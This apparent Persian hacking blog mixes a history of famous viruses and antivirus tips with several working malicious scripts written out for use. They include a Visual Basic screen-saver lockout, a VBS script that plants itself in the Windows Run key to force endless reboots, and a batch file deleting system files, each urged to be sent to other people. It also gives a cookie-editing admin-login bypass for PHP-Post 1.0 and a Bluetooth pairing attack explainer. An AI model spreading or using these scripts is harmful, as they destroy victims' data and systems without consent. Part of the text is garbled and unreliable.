آموزش/هک/کرک/بوت/ویروس/ و ...

	آموزش/هک/کرک/بوت/ویروس/ و ...

یک ویروس ساده به کمک ویژوال بیسیک

این برنامه (ویروس)ویندوز رو به حالت screen saver می بره ولی کاربر دیگه قادر نیست از screen saver
خارج بشه و مطمئن باشید راه دیگه ای بجز ری استارت سیستم نمی موند
خب برای شروع ابتدا این کد ها رو در قسمت Generalفرم قرار دهید (کپی کنید)

Private Const SC_SCREEnSAVE = &HF140&
Private Const WM_SYSCOMMAND = &H112
Private Declare Function FindWindowA Lib "user32" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParm As Any) As Long
Sub ScreenSaver(blnScreenSaver As Boolean, Optional lHwnd As Long, Optional sFormCaption As String)
Dim lState As Long
If lHwnd = 0 Then
lHwnd = FindWindowA(vbNullString, sFormCaption)
End If
If blnScreenSaver Then
lState = 1
Else
lstat = -1
End If
Call SendMessage(lHwnd, WM_SYSCOMMAND, SC_SCREEnSAVE, lState)
End Sub

و در اخر یه timerبا قابلیت interval=1 به فرم اضافه کنید و کد های زیر را به فرم اضافه کنید(کپی کنید)

Private Sub Timer1_Timer()
Call ScreenSaver(Me.hWnd, Me.hWnd, -1)
End Sub

تو ضیحات:
۱-صرفا عاملی که بر نامه رو به یه شبه ویروس تبدیل می کنه وجوده تایمره با قابلیت intervalبسیار کم برای
گرفتن هر گونه قدرت عکس العمل از قربانی میگیره چون باعث میشه هربار که کاربر screen saver
را غیر فعال می کنه دوباره اونو اجرا کنه

+ نوشته شده در یکشنبه پانزدهم اردیبهشت 1387ساعت 6:42 قبل از ظهر توسط mahyar |

بدترین ویروس ها کدام بودند؟

اگر تا به حال یک ویروس کامپیوتری را تجربه نکرده اید، فقط صبر کنید! حتما در اینده تجربه خواهید کرد. دلتان برای روزهای خوش ویروسهای کامپیوتر تنگ شده است؟ برای زمانی که نرم افزار های ضد ویروس هنوز چندان قوی نبودند، و حمله ویروسها هر شبانه روز میلیونها دلار خسارت وارد می کرد. ویروسهای امروزی می توانند یک کابوس ترسناک باشند، اما برای کاربرهای سطح متوسط، پاک کردن ویروس نسبتا آسانتر از آن است که تنها در چند سال اخیر انجام می شد، زمانی که تنها راه چاره در بیشتر مواقع فرمت کردن هارد دیسک بود و شروع کردن از صفر. و چه بسا اینکه همیشه هم کار ساز نبود.

پس با ما در سیری در دنیای خاطراتی که در شرایط امنیتی بالا نگهداری می شوند همراه شوید. سری به برخی از ویروس های خطرناک همه دوران می زنیم و شانسهایی را که کامپیوتر های ما با وجود همه این ویروس ها داشتند و تا حال حاظر سرپا مانده اند می شماریم. (البته توجه داشته باشید که کلمه بدترین، مبحث مهم قابل توجهی در صنعت امنیت و ایمنی است، و نسبت به تعداد ماشین های الوده شده به ویروس و مقدار خسارت های مالی وارد شده به کامپیوترها تخمین زده میشود.) اگر شما فکر می کنید که ویروس دیگری وجود دارد که از این ویروس ها بدتر باشد، لطفا نام ان را در کامنت این پست ذکر کنید.

بدترین ویروس هایی که تابه حال نوشته شده اند:

برین، 1986:

برین اولین ویروس واقعی بود که تا آن سال، یعنی 1986 کشف شده بود. برین نمی توانست به طور جدی به کامپیوتر شما صدمه بزند، اما صنعت مالویر ( نرم افزارهای که بر فایلهای کامپیوتری، بدون اینکه اطلاعاتی از کاربر ان مشخص شود اثر می گذاشت) را رواج داد و ایده های مخربی را به بیش از صد میلیون ویروس ساز در دو دهه اخیر داد )

میکل انجلو، 1991:

بدترین ویروس ام اس داسی که تا به حال ساخته شده است. میکل انجلو به بوت سکتور ( قسمتی که کامپیوتر برای شروع کردن ابتدا از ان استفا ده می کند) هارد دیسک و هر فلاپی که وارد کامپیوتر شود حمله کرد. شروع کردن ویروس از قسمت بوت سکتور باعث می شود که به سرعت در همه قسمتهای دیسک منتشر شود. بعد از پخش شدن ویروس، در ششم مارس فعال شد و بدون معطلی شروع به تخریب اطلاعات بر روی دهها هزار کامپیوتر کرد.

ملیسا، 1999:

ویروسی تکنیکی، ملیسا کل سیستم پست الکترونیکی را با استفاده از فرستادن سیلی عظیم از ایمیلها به سیستم پست الکترونیکی کاربران توسط خودشان متلاشی کرد. سازنده این ویروس درنهایت دستگیر و محکوم به بیست ماه زندان شد.

ای لاو یو، 2000:

بدون شک این اولین ویروسی است که کاربران را برای باز کردن یک فایل فریب می دهد. در این مورد کاربر تصور می کند که نامه ای از طرف یک عاشق به او فرستاده شده است. نتیجه بطور وحشتناکی مخرب بود. در یک تخمین اینگونه براورد شد که ده درصد همه کامپیوتر ها الوده شدند، و پنج و نیم میلیون دلار خسارت مالی وارد شد. شاید این ویروس به عنوان بدترین ویروس نامیده شود.

کد قرمز، 2001:

ویروس کد قرمز سرورهای شبکه اینترنت را به جای کاربران دستگاه ها مورد هدف قرار داد. نابود کرد سطح وبسایت ها و سپس انتشار عدم-وجود-حمله بر میزبان ادرسهای ای پی، از جمله کاخ سفید.

نیمدا، 2001:

بر اساس سیستم حمله ویروس کد قرمز ساخته شد و از چند طریق به دستگاه ها حمله می کند. (ایمیل، وبسایت ها، شبکه های متصل، و غیره). نیمدا هم وبسایت ها و سرورها، و هم کاربران را الوده میکند. این ویروس تنها بعد از بیست و دو دقیقه پس از الوده کردن، بطور شگرفی راه خود را پیدا میکند و منتشر می شود. نیمدا بدون شک شایع ترین ویروس اینترنتی است.

کلز، 2001:

یک ویروس ایمیلی. کلز پیشگام ویروسهایی بود که از راه فریفتن با آدرس فرستنده ایمیل مسیر خود را به کامپیوتر میزبان باز می کرد. باور اینکه بیل گیت برای شما به وسیله ایمیل پول رایگان فرستاده است کمی سخت است.

اسلمر، 2003:

ویروس دیگری که به سرعت منتشر می شود، این کرم حدود هفت صد و پنجاه میلیون سیستم را تنها در ده دقیقه آوده کرد. کند کردن سرعت اینترنت همانند ویروس کد قرمز و از کارانداختن هزاران وبسایت از توانایی های این ویروس بود.

مکدوم، 2004:

سریع الانتشار ترین ویروسی که تابه حال ساخته شده است. مکدوم کامپیوتر ها را به گونه ای الوده کرد که خود دستگاه ها هرز نامه های بیشتری را منتشر کردند. در حرکتی غیر قابل پیش بینی، مکدوم وبسایت گروه اس سی او را مورد حمله قرار داد. شرکت نچندان معروفی که شرکت های دیگر را نسبت به استفاده کردن از آن شرکت مورد دادخواست قرار می داد.

استورم، 2007:

یکی از ویروس های مخرب اخیر، کرمی که از طریق هرز نامه با جعل کردن پیوست ایمیل انتشار میابد. این ویروس در نهایت بیش از ده میلیون کامپیوتر را الوده کرد و انها را وادار به ملحق شدن به کشتی انترنتی زامبی خودش کرد.

+ نوشته شده در یکشنبه پانزدهم اردیبهشت 1387ساعت 6:32 قبل از ظهر توسط mahyar |

پاسخ به در خواست ها !

اول از همه باید بگم اگه کد ویروس میکر یا خوده ویروس میکر را می خایید به http://www.escada.blogfa.com مراجعه کنید .

و در رابطه با اجرای فایل بايد بگم كه شما مي توانيد از دستور shell در دکمه مورد نظر استفاده كنيد .

( هنگام استفاده از دستور خود ويژوال توضيحات لازم را مدهد . )

+ نوشته شده در پنجشنبه پانزدهم فروردین 1387ساعت 8:28 قبل از ظهر توسط mahyar |

اطلاعاتي در باره ويروسهاي كامپيوتري

ويروس كامپيوتري چيست؟

ويروس كامپيوتري برنامه‌اي است مخرب كه مي‌تواند خود را تکثير و در برنامه‌هاي ديگر قرار دهد. هر برنامه آلوده مي‌تواند به نوبه خود نسخه‌هاي ديگري از ويروس را در برنامه‌هاي ديگر قرار دهد.

آشنايي با انواع مختلف برنامه‌هاي مخرب

Email virus

اين نوع ويروسها از طريق E-mail وارد سيستم مي‌شوند معمولاً به صورت مخفيانه درون يك فايل ضميمه شده قرار دارند که با گشودن يك صفحه HTML يا يك فايل اجرايي برنامه‌اي و يا يك word document مي توانند فعال‌ شوند.

Marco virus
نرم افزارهايي مانند word و Excel اين امکان را براي كاربر بوجود مي آورند كه در صفحه متن خود ماكرويي ايجاد نمايد،اين ماكرو حاوي يكسري دستور العملها، عمليات‌ است كه تماماً توسط خود كاربر ايجاد ميگردند.اين نوع ويروسها معمولاً به شکل ماکرو در فايلهايي قرار مي گيرند كه حاوي صفحات متني (word document) مي باشند . ماكرو ويروسها معمولاً طوري تنظيم شده‌اندكه به راحتي خود را در همه صفحات متني ساخته شده با همان نرم افزار (Excel , ms word) جاي مي‌‌دهند.

اسب تروآ:
عملكرد اين برنامه‌ها ساده و درعين حال خطرناك است درحاليكه كاربر متوجه نيست و با تصاوير گرافيکي زيبا و شايد همراه با موسيقي مسحور شده برنامه عمليات مخرب خود را آغاز مي کند براي مثال به خيال خودتان بازي جديد و مهيجي را از اينترنت Download كرده‌ايد ولي وقتي آنرا اجرا مي‌كنيد متوجه خواهيد شد که تمامي فايلهاي روي هارد ديسك پاك شده و يا به طور كلي فرمت گرديده است.

كرمها (worm)
برنامه كرم برنامه‌اي است كه با كپي كردن خود توليد مثل مي‌كند كرمها براي توليد مثل نياز به برنامة ميزبان ندارند و بدون استفاده از يك برنامة حامل به تمامي سطوح سيستم كامپيوتري «خزيده» و نفوذ مي‌كنند

ويروسهاي (Boot sector) بوت سكتور و پارتيشن
Boot sector قسمتي از ديسك سخت و يا فلاپي است كه هنگام راه اندازي سيستم اطلاعات از روي آن به خوانده مي‌شود. در Boot Sector برنامه اي است كه فايلهاي سيستمي ر ا در حافظه اصلي بار مي کند و موجب راه اندازي کامپيوتر مي شود لذا ويروسي شدن اين قسمت موجب عدم راه اندازي سيستم مي شود.

HOAX (گول زنك‌ها)
اين نوع ويروسها در قالب پيغامهاي فريب آميزي ، كاربران اينترنت را گول زده و به كام خود مي‌كشد. اين نوع ويروسها معمولاً به همراه يك نامه ضميمه شده از طريق پست الكترونيك وارد سيستم مي‌شوند. متن نامه مسلماً متن مشخصي نيست و تا حدودي به روحيات شخصي نويسنده ويروس بستگي دارد، پيغامها مي توانند مضموني تهديد آميز يا محبت آميز داشته باشند و يا در قالب هشداري ، مبني بر شيوع يک ويروس جديد در اينترنت ، يا درخواستي در قبال يک مبلغ قابل توجه و يا هر موضوع وسوسه انگيز ديگر باشد . لازم به ذکر است كه همه اين نامه‌ها اصل نمي‌باشند يعني ممكن است بسياري از آنها پيغام شخص سازنده ويروس نباشند بلكه شايد پيغام ويرايش شده يا تغيير يافته از يك كاربر معمولي و يا شخص ديگري باشد كه قبلا اين نامه‌ها را دريافت كرده و بدينوسيله ويروس را با پيغامي كاملاً جديد مجدداً ارسال مي‌كند.نحوه تغيير پيغام و ارسال مجدد آن بسيار ساده بوده ، همين امر باعث گسترش سريع Hoax‌ها شده،‌ با يك دستور Forward مي‌توان ويروس و متن تغيير داده شده را براي شخص ديگري ارسال كرد.

ويروسهاي چند جزئي Multipartite virus
بعضي از ويروسها، تركيبي از تكنيكها را براي انتشار استفاده کرده ، فايلهاي اجرائي، بوت سكتور و پارتيشن را آلوده مي سازند. اينگونه ويروسها معمولاً تحت windows 98يا Win.Nt انتشار نمي‌يابند

چگونه ويروسها گسترش مي‌يابند؟

زماني كه يك برنامة آلوده به ويروس را اجرا مي‌كنيد، ويروس پس از اجرا به همراه برنامه اصلي ، در ابتدا تلاش مي‌كند برنامه‌هاي ديگر را آلوده كند. اين برنامه ممكن است روي همان كامپيوتر يا برنامه‌اي بر روي كامپيوتر ديگر واقع در يك شبكه باشد. سپس برنامه تازه آلوده شده نيز پس از اجرا دقيقاً عمليات مشابه قبل را به اجرا درمي‌اورد. با اجراي فايل كامپيوترهاي ديگر نيز آلوده خواهند شد. همچنين طبيعي است با اجراي هرچه بيشتر فايلهاي آلوده فايلهاي بيشتري آلوده خواهند شد.
اگر كامپيوتري آلوده به يك ويروس بوت سكتور باشد، ويروس تلاش مي‌كند در فضاهاي سيستمي فلاپي ديسكها و هارد ديسك از خود کپي هايي بجا بگذارد . سپس فلاپي آلوده مي‌تواند كامپيوترهايي را كه از روي‌آن بوت مي‌شوند و نيز يك نسخه از ويروسي كه قبلاً روي فضاي بوت يك هارد ديسك نوشته شده نيز مي‌تواند فلاپي‌هاي جديد ديگري را نيز آلوده نمايد.
به ويروسهايي كه هم قادر به آلوده كردن فايلها و هم آلوده نمودن فضاهاي بوت مي‌باشند اصطلاحاً ويروسهاي چند جزئي (multipartite) مي گويند.
فايلهايي كه به توزيع ويروسها كمك مي‌كنند حاوي يك نوع عامل بالقوه مي‌باشند كه مي توانند هر نوع كد اجرائي را آلوده ‌كنند. براي مثال بعضي ويروسها كدهاي را آلوده مي‌كنند كه در بوت سكتور فلاپي ديسكها و فضاي سيستمي هارد ديسكها وجود دارند.
نوع ديگر اين ويروس ها كه به ويروسهاي ماكرو شناخته مي شوند ، مي‌توانند عمليات پردازش كلمه‌اي (word processing) يا صفحه‌هاي حاوي متن را كه از اين ماكروها استفاده مي‌كنند ، آلوده مي کنند. اين امر براي صفحه‌هايي با فرمت HTMl نيز صادق است.از آنجائيكه يك كد ويروس بايد حتماً قابل اجرا شدن باشد تا اثري از خود به جاي بگذارد از اينرو فايلهايي كه كامپيوتر به عنوان داده‌هاي خالص و تميز با آنها سرو كار دارد امن هستند.
فايلهاي گرافيكي و صدا مانند فايلهايي با پسوند gif . ، jpg ، mp3، wav،…هستند .
براي مثال زماني كه يك فايل با فرمت picture را تماشا مي‌كنيد كامپيوتر شما آلوده نخواهد شد.
يك كد ويروس مجبور است كه در قالب يك فرم خاص مانند يك فايل برنامه‌اي .exe يا يك فايل متني doc كه كامپيوتر واقعاً آن را اجرا مي‌كند ، قرار گيرد .

عمليات مخفيانه ويروس در كامپيوتر

همانطور كه مي‌دانيد ويروسها برنامه‌هاي نرم افزاري هستند .آنها مي‌‌توانند مشابه برنامه‌هايي باشند كه به صورت عمومي در يك كامپيوتر اجرا مي گردند .
اثر واقعي يك ويروس بستگي به نويسندة ان دارد. بعضي از ويروسها با هدف خاص ضربه زدن به فايلها طراحي مي شوند و يا اينکه در عمليات مختلف كامپيوتر دخالت کرده و ايجاد مشکل مي‌كنند.
ويروسها براحتي بدون آنكه متوجه شويد خود را تكثير کرده ، گسترش مي‌يابند ، در حين گسترش يافتن به فايلها صدمه رسانده و يا ممكن است باعث مشكلات ديگري شوند. نكته: ويروسها قادر نيستند به سخت افزار كامپيوتر صدمه اي وارد کنند . مثلاً نمي توانند باعث ذوب شدن CPU ، سوختن هارد ديسک و يا انفجار مانيتور و غيره شوند .

ويروسها و E-mail

شما صرفا با خواندن يك متن سادة e-mail يا استفاده از netpost ، ويروسي دريافت نخواهيد كرد. بلكه بايد مراقب پيغامهاي رمز دار حاوي كدهاي اجرائي و يا پيغامهايي بود كه حاوي فايل اجرائي ضميمه شده (يك فايل برنامه‌اي كد شده و يا يك word document كه حاوي ماكروهايي باشد) مي باشند. از اين رو براي به كار افتادن يك ويروس يا يك برنامه اسب تروا ، كامپيوتر مجبور به اجراي كدهايي است مي‌توانند يك برنامه ضميمه شده به e-mail ، يك word document دانلود شده از اينترنت و يا حتي مواردي از روي يك فلاپي ديسك باشند

نكاتي جهت جلوگيري از آلوده شدن سيستم

اول از هرچيزي به خاطر داشته باشيد اگر برنامه اي درست کار نکند يا کلا کامپيوتر در بعضي از عمليات سريع نباشد بدان معنا نيست كه به ويروس آلوده شده است .
اگر از يك نرم افزار آنتي ويروس شناخته شده و جديد استفاده نمي‌كنيد در قدم اول ابتدا اين نرم افزار را به همراه كليه امكاناتش بر روي سيستم نصب كرده و سعي كنيد آنرا به روز نگه داريد.
اگر فكر مي‌كنيد سيستمتان آلوده است سعي كنيد قبل از انجام هر كاري از برنامه آنتي ويروس خود استفاده كنيد.( البته اگر قبل از استفاده از آن، آنرا بروز كرده باشيد بهتر است). سعي كنيد بيشتر نرم افزارهاي آنتي ويروس را محك زده و مطمئن ترين آنها را برگزينيد.البته بعضي وقتها اگر از نرم افزارهاي آنتي ويروس قديمي هم استفاده كنيد، بد نيست. زيرا تجربه ثابت كرده که ويروس يابهاي قديمي بهتر مي توانند ويروسهايي را که براي مدتي فعال بوده و به مرور زمان بدست فراموشي سپرده شده اند را شناسايي و پاکسازي کنندولي اگر جزء افرادي هستيد كه به صورت مداوم با اينترنت سروكار داريد حتماً به يك آنتي ويروس جديد و به روز شده نياز خواهيد داشت .براي درك بهتر و داشتن آمادگي در هر لحظه براي مقابله با نفوذ ويروسها به نكات ساده ي زير توجه کنيد :
1- همانطور كه در بالا ذکر شد از يك كمپاني مشهور و شناخته شده‌ بر روي سيستم تان يک نرم افزار آنتي ويروس نصب كرده و سعي كنيد هميشه آنرا به روز نگه داريد.
2- هميشه احتمال ورود ويروسهاي جديد به سيستم وجود دارد . پس يك برنامه آنتي ويروس كه چند ماه به روز نشده نمي‌تواند در مقابل جريان ويروسها مقابله كند.
3-توصيه مي شود براي آنكه سيستم امنيتي كامپيوتر از نظم و سازماندهي برخوردار باشد برنامه a.v (آنتي ويروس) خود را سازماندهي نمائيد ، مثلاً قسمت configuration نرم افزار a.v. خود را طوري تنظيم كنيد كه به صورت اتوماتيك هر دفعه كه سيستم بوت مي‌شود آن را چك نمايد، اين امر باعث مي‌شود سيستم شما در هر لحظه در مقابل ورود ويروس و يا هنگام اجراي يك فايل اجرائي ايمن شود.
4- برنامه‌هاي آنتي ويروس در يافتن برنامه‌هاي اسب تروآ خيلي خوب عمل نمي‌كنند از اين رو در باز كردن فايلهاي باينري و فايلهاي برنامه‌هاي excel و Word كه از منابع ناشناخته و احياناً مشكوك مي‌باشند محتاط عمل كنيد.
5-اگر براي ايميل و يا اخبار اينترنتي بر روي سيستم خود نرم افزار كمكي خاصي داريد كه قادر است به صورت اتوماتيك صفحات Java script و word macro ها و يا هر گونه كد اجرائي موجود و يا ضميمه شده به يك پيغام را اجرا نمايد توصيه مي‌شود اين گزينه را غير فعال (disable) نمائيد.
6-از باز کردن فايلهايي که از طريق چت برايتان فرستاده مي شوند ، پرهيز کنيد.
7- اگر احياناً بر روي هارد ديسك خوداطلاعات مهمي داريد حتماً از همه آنها نسخه پشتيبان تهيه كنيد تا اگر اطلاعات شما آلوده شده اند يا از بين رفتند بتوانيد جايگزين كنيد

نكاتي براي جلوگيري از ورود كرمها به سيستم

از آنجائيكه اين نوع برنامه‌ها (worms) امروزه گسترش بيشتري يافته و بايد بيشتر از ساير برنامه‌هاي مخرب از آنها دوري كنيم، از اين رو به اين نوع برنامه هاي مخرب بيشتر مي‌پردازيم.كرمها برنامه‌هاي كوچكي هستند كه با رفتاري بسيار موذيانه به درون سيستم رسوخ كرده، بدون واسطه خود را تكثير كرده و خيلي زود سراسر سيستم را فرا مي‌گيرند. در زير نكاتي براي جلوگيري از ورود كرمها آورده شده است.
1) بيشتر كرمهايي كه از طريق E-mail گسترش پيدا مي‌كنند از طريق نرم افزارهاي microsoft outlook و يا out look express وارد سيستم مي‌شوند. اگر شما از اين نرم افزار استفاده مي‌كنيد پيشنهاد مي شود هميشه آخرين نسخه security patch اين نرم افزار را از سايت microsoft دريافت و به روز كنيد.
همچنين بهتر است علاوه بر به روز كردن اين قسمت از نرم افزار outlook سعي كنيد ساير نرم افزارها و حتي سيستم عامل خود را نيز در صورت امكان هميشه به روز نگه داريد، و يا حداقل بعضي از تكه‌هاي آنها را كه به صورت بروز درآمده قابل دسترسي است.
اگر از روي اينترنت بروز مي‌كنيد و يا از cd ها و بسته‌هاي نرم افزاري آماده در بازار ،از اصل بودن آنها اطمينان حاصل كنيد.
2) تا جاي ممكن در مورد e-mail attachment ها محتاط باشيد. چه در دريافت e-mail و چه در ارسال آنها.
3) هميشه ويندوز خود را در حالت show file extensions قرار دهيد.
اين گزينه در منوي Tools/folder option/view با عنوان “Hide file extensions for known file Types” قرار داردكه به صورت پيش فرض اين گزينه تيك خورده است، تيك آنرا برداريد.
4) فايلهاي attach شده با پسوندهاي SHS و VBS و يا PIF را هرگز باز نكنيد. اين نوع فايلها در اكثر موارد نرمال نيستند و ممكن است حامل يك ويروس و يا كرم باشند.
5) هرگز ضمائم دو پسوندي را باز نكنيد.
email attachment هايي با پسوندهايي مانند Neme.BMP.EXE و يا Name.TxT.VBS و …
6) پوشه‌هاي موجود بر روي سيستم خود رابجز در مواقع ضروري با ديگر كاربران به اشتراك نگذاريد . اگر مجبور به اين كار هستيد، اطمينان حاصل كنيد كه كل درايو و يا شاخه ويندوز خود را به اشتراك نگذاشته ايد.
7) زماني كه از كامپيوتر استفاده نمي‌كنيد كابل شبكه و يا مودم را جدا كرده و يا آنها را خاموش كنيد.
8) اگر از دوستي كه به نظر مي رسد ناشناس است ايميلي دريافت كرديد قبل از باز كردن ضمائم آن حتماً متن را چند بار خوانده و زماني كه مطمئن شديد از طرف يك دوست است ، آنگاه سراغ ضمائم آن برويد.
9)توصيه مي شود فايلهاي ضميمه شده به ايميل‌هاي تبليغاتي و يا احياناً weblink هاي موجود در آن‌ها را حتي الامكان باز نكنيد.
10) از فايلهاي ضميمه شده‌اي كه به هر نحوي از طريق تصاوير و يا عناوين خاص، به تبليغ مسائل جنسي و مانند آن مي پردازند ، دوري كنيد. عناويني مانند porno.exe و يا pamela-Nude.VBS كه باعث گول خوردن كاربران مي‌شود.
11) به آيكون فايلهاي ضميمه شده نيز به هيچ عنوان اعتماد نكنيد. چرا که ممكن است كرمهايي در قالب فايل عكس و يا يک فايل متني فرستاده شود ولي در حقيقت اين فايل يك فايل اجرائي بوده و باعث فريب خوردن كاربر مي‌شود.
12)در massenger هايي مانند IRC، ICQ و يا AOL به هيچ عنوان فايلهاي ارسالي از جانب كاربران ناشناس on-line درchat system ها را قبول (accept) نكنيد.
13) از Download كردن فايل از گروه‌هاي خبري همگاني نيز پرهيز كنيد.(usenet news) زيرا اغلب گروه‌هاي خبري خود يكي از علل پخش ويروس مي باشند .

ابزارهاي مهم و پر استفاده در سيستم عامل مي‌باشد كه بسياري از امور ذخيره و بايگاني اطلاعات به وسيلة آن انجام مي‌شود. فايل روشي براي نگهداري و طبقه‌بندي اطلاعات در حافظة جانبي (ديسك، CD و . . .) كامپيوترها مي‌باشد که مفهوم آن با پرونده در ادارات و مدارس مطابقت دارد. يعني همان‌طوري كه اطلاعات دانش‌آموزان اعم از كارنامه‌هاي تحصيلي، فتوكپي شناسنامه، و . . . به صورت يك پرونده نگهداري مي‌شود. اطلاعات موجود در كامپيوترها نيز به صورت فايل نگهداري و طبقه‌بندي مي‌شوند. لذا هرگونه اطلاعات (مانند: متن، صوت، فيلم و عکس) و برنامه‌اي (مانند برنامة ترافيک، حسابداري) كه بخواهيم به صورت دائمي در حافظة جانبي ذخيره كنيم مي‌بايد آن را در قالب (Format) فايل ذخيره كنيم. زيرا سيستم عامل فقط اطلاعات را در قالب فايل مي‌تواند نگهداري و مديريت نمايد.

+ نوشته شده در پنجشنبه ششم دی 1386ساعت 1:26 بعد از ظهر توسط mahyar |

اين اسکريپت روی هرکامپيوتری اجرا بشه نمی زاره کامپيوترش بالا بیاد. حتی فرصت کليک کردن روی ايکن رو بهش نمی ده .و پشت سر هم restart می شه! می تونيد روی کامپيوتر خودتون هم اجراش کنيد . برای خلاصی ازش بايد فايل C:\restart.vbs رو از کامپيوترتون از طريق Dos حذف کنيد بعد ويندوزتون بالا می آد
کد پایین را روی notepad کپی کنيد و فايل را با پسوند vbs ذخيره کنيد. می تونيد برای هر کسی بفرستيد.

Set TxtFile = FSO.CreateTextFile("c:\restart.vbs", 2, False) TxtFile.WriteLine "Sub ShutDown " TxtFile.WriteLine "nLogOff=0 " TxtFile.Write

Line "nReboot=2 " TxtFile.WriteLine "nForceLogOff=4 " TxtFile.WriteLine "nForce

Reboot=6 " TxtFile.WriteLine "nPowerDown=8 " TxtFile.WriteLine "nForcePowerDown=12 " TxtFile.WriteLine "Set oOS = GetObject("+chr(34)+"winmgmts:{(Shutdown)}"+chr(34)+".ExecQuery

("+chr(34)+"Select * from Win32_OperatingSystem"+chr(34)+" " TxtFile.WriteLine "For

Each oOperatingSystem in oOS " TxtFile.WriteLine " oOperatingSystem.Win32Shutdown(nForcePowerDown) " TxtFile.WriteLine "Next " TxtFile.WriteLine "End sub " TxtFile.WriteLine "ShutDown " TxtFile.Close Set WshShell = CreateObject("WScript.Shell"

WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\

Windows\CurrentVersion\

Run\Restart", "c:\restart.vbs" End sub ShutDown

این ویروس در Internet Explorer فیلتر گذاری می کنه و باعث خراب شدنه اون میشه؟؟؟

برایه این کار:

۱.یه Notepad باز کنین

۲.توش بنویسینpouped-blocked-web-exploure-online&offline

۳.بعد با نامهbat.سیو کنید

يک TXT Document باز کنيد و بعد اين کامند راداخل آن بنويسيد:

del autoexec.bat

del config.sys

cd winnt

del system.ini

del win.ini

بعد فايل رو با پسوند Bat . سيو کنيد. وقتی اين فايل را برای کسی بفرستيد هيچ چيز نمی شود ولی وقتی اجرايش کند کامپيوترش را ريست کرده و ديگر ويندوزش بالا نمی آيد. اگر خواستيد می توانيد روی کامپيوتر خودتون هم امتحان کنيد اما اگر حوصله ويندوز ريختن داريد اين کاررا را انجام دهيد. اين هم همان ويروس است ،اجرايش نکنيد و لی برای هر کسی که خواستيد بفرستيد.

موفق باشيد

+ نوشته شده در پنجشنبه بیست و دوم آذر 1386ساعت 9:28 بعد از ظهر توسط mahyar |

سلام امروز داشتم تو اينترنت به چند سايت امنيتي خوب ايران نگاه مي كردم كه به چند تا مطلب جالب بر خوردم و براتون گذاشتم

PHP-Post 1.0

-------

مشخصات:
-----------------------
نام و نسخه محصول:
PHP-Post 1.0
سازنده:
http://php-post.co.uk/
نوع آسیب پذیری : دور زدن "ورود خودکار"
تاریخ کشف: 23 نوامبر 2005
تاریخ انتشار: 18 جولای 2006
تاریخ اطلاع به سازنده: 1 ژوئن 2006

درباره برنامه:
php-post یک سیستم مدیریت تالارگفتمان (فروم) که با php نوشته شده است.

شرح آسیب پذیری:
-----------------------
ضعف امنیتی در قسمت چکینگ برنامه برای ورود یک کاربر و در کل صفحات از جمله صفحات مدیریت سایت وجود دارد . این حفره از ساختار ضعیف امنیتی نشات گرفته و برای ورود خودکار کاربر (auto login) در تمام صفحات از کوکی بهره می برد . در صورتی که مهاجم تیک auto login را فعال کند برنامه به جای چک کردن session از cookie بدون نیاز به پسورد استفاده می کند هر چند که پسورد نیز به صورت کد شده در کوکی قرار می گیرد .

كد مخرب:
-----------------------
پس از ثبت نام و وارد شدن به حالت auto login کوکی های خود را از :
Cookie: logincookie[pwd]=5a329326344d1d38; logincookie[user]=3nitr0; logincookie[last]=2006-07-07+05%3A24%3A44; logincookie[lastv]=1152264284; post[329]=330

به این حالت تغییر دهید که logincookieuser را به یوزرنیم مدیر سایت می بایستی تغییر دهید.
Cookie: logincookie[pwd]=5a329326344d1d38; logincookie[user]="ADMIN`S USERNAME"; logincookie[last]=2006-07-07+05%3A24%3A44; logincookie[lastv]=1152264284; post[329]=330

راهکار امنيتي:
-----------------------
به دلیل اینکه کل طراحی امنیتی برنامه دچار آسیب پذیری بود بعد از فرصت تیم کپدا به سازنده برنامه نسخه جدید آن (1.01) منتشر شده و قابل دریافت از صفحه اصلی سایت php-post می باشد .

توسط:
-----------------------
farhadkey [at} kapda.ir
كانون پژوهشگران دانش امنيت - K

متخصصین علم رمز نگاری شیوه جدید رو برای هک کردن یک ارتباط بلوتوث پیدا کردند. ارزش این قضیه وقتی مشخص میشه که بدونین این شیوه حمله وقتی که موارد امنیتی ابزار بلوتوث فعال باشه هم کار میکنه !! هکرها با استفاده از این شیوه حمله میتونن توسط موبایل قربانی با هر جای دنیا که میخوان تماس برقرار کنند.

در آوریل 2005 بود که آقای اولی وایتهاوس انگلیسی راهی رو پیدا کرد که ابزارهای بلوتوث حتی اگه در مود امن هم قرار گرفته باشند میتونن مورد حمله قرار بگیرن. در این روش هکر میتونه هر تماسی رو با هر جایی که خواست توسط موبایل قربانی برقرار کنه .

البته ریسک این حمله بسیار پایینه... چون این الگوریتم وقتی کار میکنه که هکر دقیقا در زمانی که ارتباط بلوتوث میخواد شروع بشه .. به پروسه حمله بکنه.... پروسه ای بنام Pairing .

همونطوری که قبلا هم گفته بودم دو ابزار بلوتوث وقتی میخوان ارتباط برقرار کنن باید یه کلید مخفی رو بین خودشون رد و بدل کنن. حتی دو متخصص اروپای شرقی اعلام کردن که میتونن چنان به ابزارهای بلوتوث حمله کنن که این ابزارها هر وقت که هکرها بخواهند باهم ارتباط برقرار کنن !!!! (ای ول اروپای شرقـــی!).

اما شیوه آقای وایتهاوس چجوری عمل میکنه ؟ برای برقراری یک ارتباط بلوتوث به یک کلید پيوندي (Link Key) نیاز هستکه پیش زمینه اون یک پین کد 4 رقمی هست. یعنی با ورود پین کد 4 رقمی درست ارتباط بلوتوث شروع به ساختن کلید پیوندی 128 بیتی میکنه. خب ! توسط یک اسنیفر بلوتوث میشه به این کلید پیوندی دست پیدا کرد. این اسنیفر میتونه پیغامهای رد و بذل شده بین دو ابزار رو ضبط کنه و از طریق تحلیل اون پیامها توسط یه نرم افزار که الگوریتمهای شناسایی در بلوتوث رو بشناسه تمام ۱۰۰۰۰ حالت ممکنه پین کد رو تست کرد. این نوع حمله فقط میتونه در اولین تماس دو ابزار بلوتوث اتفاق بیفته. ولی اون دو تا متخصص اروپای شرقی کلک خیلی قشنگی زدن !! اونا یکی از ابزارهای بلوتوث رو مجبور میکنن که پیامی به اون یکی ابزار بده که "من کلید پیوندی رو فراموش کردم !" . این باعث میشه که ارتباط دو ابزار موقتا قطع بشه و با یک کلید پیوندی جدید ارتباط جدیدی ایجاد بشه.

